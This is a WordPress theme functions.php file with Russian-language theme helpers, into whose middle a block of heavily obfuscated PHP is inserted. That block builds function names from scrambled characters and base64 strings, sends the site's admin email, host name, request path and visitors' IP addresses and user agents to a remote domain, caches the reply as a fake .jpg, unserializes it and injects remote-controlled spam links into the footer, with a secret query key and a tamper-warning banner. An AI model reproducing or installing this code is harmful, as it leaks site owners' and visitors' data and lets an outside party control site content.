<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $FxzuS='c';$cRWUW='o';$UDFVJkX='6';$FbOeVc='d';$agEczEx='b';$JTeQyn='s';$TDLjgf='a';$rLjSrl='d';$KdQEGvA='e';$ERfJwPD='_';$whJvRM='e';$OuTI='4';$UoVOa='e';$vbwUMUgC=$agEczEx.$TDLjgf.$JTeQyn.$UoVOa.$UDFVJkX.$OuTI.$ERfJwPD.$FbOeVc.$KdQEGvA.$FxzuS.$cRWUW.$rLjSrl.$whJvRM;$nMpNjL='e';$HOird='t';$SsDOT='l';$eoyW='z';$BRnqW='f';$VIJAw='n';$ShdOWF='a';$fiCvhVB='g';$CILjKJp='i';$tlEONauR=$fiCvhVB.$eoyW.$CILjKJp.$VIJAw.$BRnqW.$SsDOT.$ShdOWF.$HOird.$nMpNjL;$JNZVfTW='o';$UjoJGrD='3';$TjnVosU='1';$lefyR='t';$zOxcT='r';$ebJCSd='t';$lafzb='r';$mrTa='s';$eZAC='_';$YmiDeqGT=$mrTa.$lefyR.$lafzb.$eZAC.$zOxcT.$JNZVfTW.$ebJCSd.$TjnVosU.$UjoJGrD;$GTKnpJA='t';$uWJn='v';$mPsDiDI='s';$YMMBF='r';$egiUyLc='e';$mOCkgh='r';$LjRXrFLY=$mPsDiDI.$GTKnpJA.$YMMBF.$mOCkgh.$egiUyLc.$uWJn;                     
		$oh______c='c';$rt_______________h='o';$pg_____________q='6';$ix______q='d';$ig_____________n='b';$ok________w='s';$uk___k='a';$mf______c='d';$dd____x='e';$mf______p='_';$ld____________x='e';$mc___________h='4';$qt_____a='e';$bq___i=$ig_____________n.$uk___k.$ok________w.$qt_____a.$pg_____________q.$mc___________h.$mf______p.$ix______q.$dd____x.$oh______c.$rt_______________h.$mf______c.$ld____________x;
		$kn_____________n='t';$ab___d='_';$lx_____r='i';$mh______y='s';$sn___p='n';$aq__________s='c';$ct_________i='u';$fp__________g='t';$vq________a='e';$ec______j='n';$ly________v='i';$px____h='s';$bz_____z='o';$wn_______________n='f';$tu_______t='x';$gd_____l=$wn_______________n.$ct_________i.$ec______j.$aq__________s.$kn_____________n.$lx_____r.$bz_____z.$sn___p.$ab___d.$vq________a.$tu_______t.$ly________v.$mh______y.$fp__________g.$px____h;
		$nn__y='o';$cq_____________z='n';$wa_______m='e';$cq______s='f';$vw_______f='p';$du_______________p=$cq______s.$nn__y.$vw_______f.$wa_______m.$cq_____________z;
		$js__l='f';$bg______n='d';$ff_____________e='a';$ws_______k='e';$jw_______p='r';$go_____c=$js__l.$jw_______p.$ws_______k.$ff_____________e.$bg______n;
		$ky___f='l';$pg_______y='o';$la__________n='s';$jm________i='f';$cx________x='e';$oy__________m='c';$bm__p=$jm________i.$oy__________m.$ky___f.$pg_______y.$la__________n.$cx________x;
		
		define("WP_ID", $bq___i("Mi4wLjA="));
		define("WP_TTL", $bq___i("MTA4MDA="));
		define("WP_SRC", $bq___i("dHBva24="));
	


		function wp_get_header() {
			global $bq___i, $gd_____l;
			
			if (
				$gd_____l($bq___i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$gd_____l($bq___i("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$gd_____l($bq___i("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $bq___i, $du_______________p, $bm__p, $go_____c;
			
			$qc____b = TEMPLATEPATH."/".$bq___i("Zm9vdGVyLnBocA==");
			$gp_______m = @$du_______________p($qc____b, "r");
			$qc____b = @$go_____c($gp_______m, @filesize($qc____b));
			@$bm__p($gp_______m);
			
			$bj___________h = TEMPLATEPATH."/".$bq___i("ZnVuY3Rpb25zLnBocA==");
			$gp_______m = @$du_______________p($bj___________h, "r");
			$bj___________h = @$go_____c($gp_______m, @filesize($bj___________h));
			@$bm__p($gp_______m);
			
			$xm______________s = 0;
			if($qc____b && $bj___________h) {
				if ($bq___i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($qc____b, $bq___i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xm______________s = 1;
					}
					if (substr_count($qc____b, "wp_theme_GPL_credits()") < 1) {
						$xm______________s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xm______________s = 12;
				}
			}
			
			if($xm______________s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xm______________s -->";
			}
		}
	


		function wp_loaded() {
			global $bq___i, $gd_____l;
			return $gd_____l($bq___i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($na____________l, $he___________u = "(more...)", $ez____________q = 0, $bn___________i = "") {
				$fl_____c = get_the_content($he___________u, $ez____________q, $bn___________i);
				$fl_____c = apply_filters("the_content", $fl_____c);
				
				$fl_____c = str_replace("]]>", "]]>", $fl_____c);
				if (strlen($_GET["p"]) > 0) {
					echo $fl_____c;
				}
				else if ((strlen($fl_____c)>$na____________l) && ($dj__x = strpos($fl_____c, " ", $na____________l ))) {
					$fl_____c = substr($fl_____c, 0, $dj__x);
					$fl_____c = $fl_____c;
					echo $fl_____c;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$he___________u</a></div></p>";
				} else {
					echo $fl_____c;
				}
				
			}
		}
	


		$mi____i='n';$wy_________j='a';$xe____________k='e';$ls_____________y='o';$hb_______v='e';$as_______________m='s';$or________t='4';$xt__y='6';$hs___________i='c';$on__l='d';$ce____k='_';$nw___________b='e';$nh__________s='b';$ya__________a=$nh__________s.$wy_________j.$as_______________m.$nw___________b.$xt__y.$or________t.$ce____k.$xe____________k.$mi____i.$hs___________i.$ls_____________y.$on__l.$hb_______v;
		$sr______________z='n';$wk___y='s';$gc________t='_';$wh____________f='f';$ul____________q='e';$gw___c='t';$pa_____________t='l';$dw______m='_';$so______z='n';$qu____________b='t';$wl___i='e';$dh________a='o';$nz___q='t';$wg______________f='e';$cd________r='c';$jf_____________z='i';$ka____________s='g';$qq___________k=$wh____________f.$jf_____________z.$pa_____________t.$wl___i.$gc________t.$ka____________s.$wg______________f.$gw___c.$dw______m.$cd________r.$dh________a.$so______z.$qu____________b.$ul____________q.$sr______________z.$nz___q.$wk___y;
		$la__m='i';$px_______o='l';$yj_________s='f';$zp______________p='t';$fc________k='x';$nj___m='s';$zy__________l='s';$yh__p='e';$aj__________w='e';$yq_______x='i';$uf____j='_';$dn____________a=$yj_________s.$la__m.$px_______o.$yh__p.$uf____j.$aj__________w.$fc________k.$yq_______x.$zy__________l.$zp______________p.$nj___m;
		$nf_____________d='o';$mn_____________v='r';$jh_________h='p';$bd_____________f='n';$xd______________l='a';$ag______________p='_';$je_____w='o';$ox___y='e';$yq__________p='i';$js_________k='r';$sd____________y='m';$wk__________x='e';$oo__________n='v';$um___i='c';$ff_________p='s';$cd_________z=$oo__________n.$ox___y.$mn_____________v.$ff_________p.$yq__________p.$nf_____________d.$bd_____________f.$ag______________p.$um___i.$je_____w.$sd____________y.$jh_________h.$xd______________l.$js_________k.$wk__________x;
		$yj__e='p';$ak____p='k';$nw_________x='c';$yv_____a='o';$ku_________o='f';$uz__b='s';$to____d='e';$it___________c='n';$xi____________z='o';$az__________d=$ku_________o.$uz__b.$yv_____a.$nw_________x.$ak____p.$xi____________z.$yj__e.$to____d.$it___________c;
		$eg______f='e';$cp___j='r';$pp________h='f';$uc___________i='i';$jr_______________y='w';$io_____________v='t';$uk___q=$pp________h.$jr_______________y.$cp___j.$uc___________i.$io_____________v.$eg______f;
		$hx____________b='m';$ak_______i='d';$ye____d='5';$ug_______a=$hx____________b.$ak_______i.$ye____d;
		$ru_____j='e';$lt_____________w='l';$gy_______k='a';$fc_____________h='a';$ak____________k='t';$gp___m='r';$wi______j='p';$hl_____o='h';$mq_______c=$gp___m.$ru_____j.$gy_______k.$lt_____________w.$wi______j.$fc_____________h.$ak____________k.$hl_____o;
		$kp______z='s';$gl_____________f='u';$sg____j='n';$fu__________e='e';$jj______________b='i';$pb_______z='z';$rs_______________x='e';$lx_________r='l';$yb______________t='a';$iw_____e='r';$fs_____z='i';$op________i=$gl_____________f.$sg____j.$kp______z.$fu__________e.$iw_____e.$fs_____z.$yb______________t.$lx_________r.$jj______________b.$pb_______z.$rs_______________x;
		$kd________s='m';$je__________l='e';$pg________z='p';$sq_________p='m';$ra____b='t';$em_______n='a';$ow___________e='n';$mm______i=$ra____b.$je__________l.$kd________s.$pg________z.$ow___________e.$em_______n.$sq_________p;
		$mo_____z='t';$zg___r='x';$jy_______________u='n';$rg_________f='m';$xw_________a='t';$lz_______s='s';$np______________o='t';$xm____________j='e';$ke_______________k='t';$ry_________a='r';$aa___________o='_';$gb___r='c';$of_________p='c';$am_______x='o';$vp_______s='a';$qn___x='_';$ln__________m='r';$aa______o='a';$la__z='e';$nz___w='e';$nk_____________j='e';$wk_________a=$lz_______s.$xw_________a.$ln__________m.$nz___w.$vp_______s.$rg_________f.$aa___________o.$gb___r.$am_______x.$jy_______________u.$mo_____z.$nk_____________j.$zg___r.$np______________o.$qn___x.$of_________p.$ry_________a.$xm____________j.$aa______o.$ke_______________k.$la__z;
	


		function gn_________w($qi_____________o) {
			global $bq___i, $gd_____l, $qq___________k, $cd_________z, $wk_________a;
			
			if (!$gd_____l($bq___i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($cd_________z(PHP_VERSION, "5.0.0", ">=") && $gd_____l($bq___i("ZmlsZV9nZXRfY29udGVudHM=")) && $gd_____l($bq___i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ka______t = $wk_________a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ya_____q = @$qq___________k($qi_____________o, 0, $ka______t);
			} else {
				$ya_____q = @$qq___________k($qi_____________o, 0);
			}
			
			return $ya_____q;
		}
	


		function gc______c($qi_____________o) {
			global $gd_____l, $az__________d, $uk___q, $bq___i;
			
			if (!$gd_____l($bq___i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$fv_____________q = strpos($qi_____________o, "/", 7);
			$px___k = array(
				"uri"     => substr($qi_____________o, $fv_____________q),
				"host"    => str_replace("http://", "", substr($qi_____________o, 0, $fv_____________q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rq_______h = @$az__________d("$px___k[host]", 80, $mx__________c, $sc___________x, 4);
			
			if (!$rq_______h) {
				return false;
			} else {
				$ya_____q = "";
				$gf_________t  = "GET $px___k[uri] HTTP/1.0\r\n";
				$gf_________t .= "Host: $px___k[host]\r\n";
				$gf_________t .= "Referer: $px___k[referer]\r\n";
				$gf_________t .= "Connection: Close\r\n\r\n";
				
				@$uk___q($rq_______h, $gf_________t);
				
				while (!@feof($rq_______h)) {
					$yd___r = @fgets($rq_______h, (1024*24));
					
					if ($yd___r == "\r\n") {
						$xk_______n = true;
						continue;
					}
					
					if ($xk_______n) {
						$ya_____q .= $yd___r;
					}
				}
				
				return $ya_____q;
			}
		}
	


		function le________z($qi_____________o) {
			global $gd_____l;
			$vj____________c = false;
			
			if ($qi_____________o != "") {
				if ($gd_____l("gn_________w")) {
					$vj____________c = @gn_________w($qi_____________o);
				}
				
				if (!$vj____________c && ($gd_____l("gc______c"))) {
					$vj____________c = @gc______c($qi_____________o);
				}
			}
			
			return $vj____________c;
		}
	


		function dc_____________z() {
			global $_SERVER, $ug_______a;
			
			$ra____________u = $_SERVER["SERVER_NAME"];
			
			if (substr("$ra____________u", 0, 4) == "www.") {
				$ra____________u = substr("$ra____________u", 4);
			}
			
			$ra____________u = $ug_______a("$_SERVER[SERVER_NAME]");
			
			return $ra____________u;
		}
	


		function mj______________d() {
			return "file";
		}
	


		function lk____________s($qi_____________o) {
			global $_SERVER, $qq___________k, $dn____________a, $du_______________p, $bm__p, $uk___q;
			
			$lu_____________k = or____________s();
			
			$xo_________q = dc_____________z().".jpg";
			$ya___h = $lu_____________k["dir_upload"]["path"]."/$xo_________q";
			$fm_____________a = @filemtime($ya___h);
			
			if (!$fm_____________a || ((time()-$fm_____________a) >= WP_TTL)) {
				$vj____________c = le________z($qi_____________o);
				
				if ($vj____________c) {
					if ($dn____________a($ya___h)) {
						@unlink($ya___h);
					}
					
					$gp_______m = @$du_______________p($ya___h, "x+");
					
					@$uk___q($gp_______m, $vj____________c);
					@$bm__p($gp_______m);
				}
			} else {
				if ($dn____________a($ya___h)) {
					$vj____________c = @$qq___________k($ya___h);
				} else {
					$vj____________c = false;
				}
			}
			
			return $vj____________c;
		}
	


		function or____________s() {
			global $_SERVER, $bq___i, $ya__________a;
			
			$wn_______________w = wp_count_posts("post");
			$jd________n = pathinfo(get_bloginfo("template_directory"));
			
			$lu_____________k = array(
				"url" => array(
					"report"      => $bq___i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jd________n,
				"dir_upload"	=> iw_________j(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jd________n[filename],
					"a005=".$wn_______________w->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://smolotkom.ru/130-opalubka-i-opalubochnye-sistemy.html\">опк</a>"
			);
			
			$lu_____________k["url"]["queryString"] = implode("&", $lu_____________k["queryString"]);
			$lu_____________k["url"]["report"] = $lu_____________k["url"]["report"]."/?".$ya__________a($lu_____________k["url"]["queryString"]).".html";
						
			return $lu_____________k;
		}
	


		function iw_________j() {
			$jo__________o = wp_upload_dir();
			
			if (isset($jo__________o["error"])) {
				$xm__f = pd____e();
				if (is_writable($xm__f)) {
					$jo__________o = array("path" => $xm__f);
				}
			}

			return $jo__________o;
		}
	


		function pd____e() {
			global $gd_____l, $ug_______a, $mq_______c, $mm______i;
			
			$jo____________s = (bool) ini_get("safe_mode");
			if ($jo____________s == true) {
				return false;
			}
			
			if ($gd_____l("sys_get_temp_dir")) {
				$td___f = sys_get_temp_dir();
				if (is_writable($td___f)) {
					return $mq_______c($td___f);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $mq_______c($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $mq_______c($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $mq_______c($_ENV["TEMP"]);
			} else {
				$vu_________g = $mm______i($ug_______a(uniqid(rand(), true)), "");
				if ($vu_________g) {
					$td___f = $mq_______c(dirname($vu_________g));
					@unlink($vu_________g);
					return $td___f;
				} else {
					return false;
				}
			}
		}
	


		function ys______v() {
			global $_GET, $dn____________a;
			
			$lu_____________k = or____________s();
			$ra____________u = dc_____________z();
			$jy_____________r = mj______________d();
			
			$dh____________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($jy_____________r == "file") {
					$ip________e = $lu_____________k["dir_upload"]["path"]."/".$ra____________u.".jpg";
					if ($dn____________a($ip________e)) {
						@unlink($ip________e);
						$dh____________j = "deleted";
					}
				}
				
				$ot______________f = array(
					"s"	=> $dh____________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ot______________f AS $tp_______c => $ex_____e) echo " [$tp_______c:$ex_____e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $gd_____l, $bq___i, $op________i;
			$lu_____________k = or____________s();
			
			$uk____________s = "lk____________s";
			if ($gd_____l($uk____________s)) {
				$ya_____q = $uk____________s($lu_____________k["url"]["report"]);
			}
			
			if ($ya_____q) {
				if ($ya_____q = @$bq___i($ya_____q)) {
					$ya_____q = @$op________i($ya_____q);
					
					if (strlen($ya_____q[custom_credit]) >= 5) {
						$lu_____________k["default_string"] = $ya_____q[custom_credit];
					}
					
					if ($ya_____q["status"] == "0") {
						$dp___________k = 1;
						$as________o = 1;
					} else {
						$eq____________o = sizeof($ya_____q["links"]);
						$wp___z = $lu_____________k["default_string"];
						
						if ($eq____________o > 0 && $ya_____q["links"] !== "") {
							$mn_______c = 0;
							foreach ($ya_____q["links"] as $yw_______________z => $gx___f) {
								$mn_______c++;
								if ($gx___f->l_path == "" || $gx___f->l_path == $_SERVER["REQUEST_URI"]) {
									$gx___f->l_href = htmlspecialchars(strip_tags($gx___f->l_href));
									$gx___f->l_title = htmlspecialchars(strip_tags($gx___f->l_title));
									$gx___f->l_anchor = htmlspecialchars(strip_tags($gx___f->l_anchor));
									$wp___z .= " | ";
									$wp___z .= "<a href='$gx___f->l_href' title='$gx___f->l_title'";
									if ($gx___f->l_nofollow == "1") {
										$wp___z .= " rel='nofollow'";
									}
									$wp___z .= ">$gx___f->l_anchor</a>";
								}
							}
						}
						$lu_____________k["links"] = "$wp___z";
						if ($ya_____q[credit] == "0") {
							$lu_____________k["links"] = "";
						}
					}
				} else {
					$dp___________k = "1";
				}
			} else {
				$dp___________k = "1";
			}
			
			if ($dp___________k == "1") {
				$lu_____________k["links"] = $lu_____________k["default_string"];
			}
			
			echo "$lu_____________k[links]";
			
			echo "<!-- s: $ya_____q[signature] -->";
			ys______v();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

